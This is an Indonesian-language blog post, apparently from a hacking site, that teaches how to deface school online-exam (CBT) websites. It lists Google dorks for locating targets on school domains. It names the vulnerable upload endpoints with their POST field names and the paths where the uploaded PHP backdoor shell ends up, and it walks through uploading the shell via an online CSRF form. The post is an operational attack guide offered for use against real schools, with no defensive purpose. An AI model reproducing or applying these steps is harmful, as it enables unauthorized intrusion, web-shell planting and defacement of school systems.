Hi gan, kali ini admin bakalan share cara deface menggunakan poc CBT
Untuk Bahan-Bahan:
– Hp/PC
– internet lancar
– Shell Backdoor
– Script Deface
– Drok
_ Exploit
_ CSRF
Dork :
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian online
inurl:/login.php intitle:cbt beesmart
CSRF ONLINE DISINI
Step By Step :
(ini Ada Beberapa Exploit Path Shell Dan Post Datanya Juga Beda")
exploit : site.sch.id/panel/pages/upload_gambar.php
exploit : site.sch.id/panel/pages/upload_jawab7.php
Post Data: uploadfile7
Path shell : site.sch.id/pictures/shell.php
exploit : site.sch.id/panel/pages/upload_video.php
Post Data: uploadfile3
Path shell : site.sch.id/video/shell.php
exploit : site.sch.id/panel/pages/upload_audio.php
Post Data: uploadfile2
Path shell : site.sch.id/audio/shell.php
1. Dorking Dulu Pakai Dork Diatas (Yang Sabar)
2. Masukin Exploit Jika vuln akan Terlihat Seperti Gambar Di Bawah
3. Langsung Copy Ajha url target ke dalam csrf, Post datanya Masukin sesuai list yang ada di atas
4. Kalo Berhasil Akan Terlihat Seperti Ini
4. Kalo Berhasil Akan Terlihat Seperti Ini
5. Langsung Cek Shell Nya Ajha Cok Sesuai List di atas
Terimakasih :)
Post A Comment: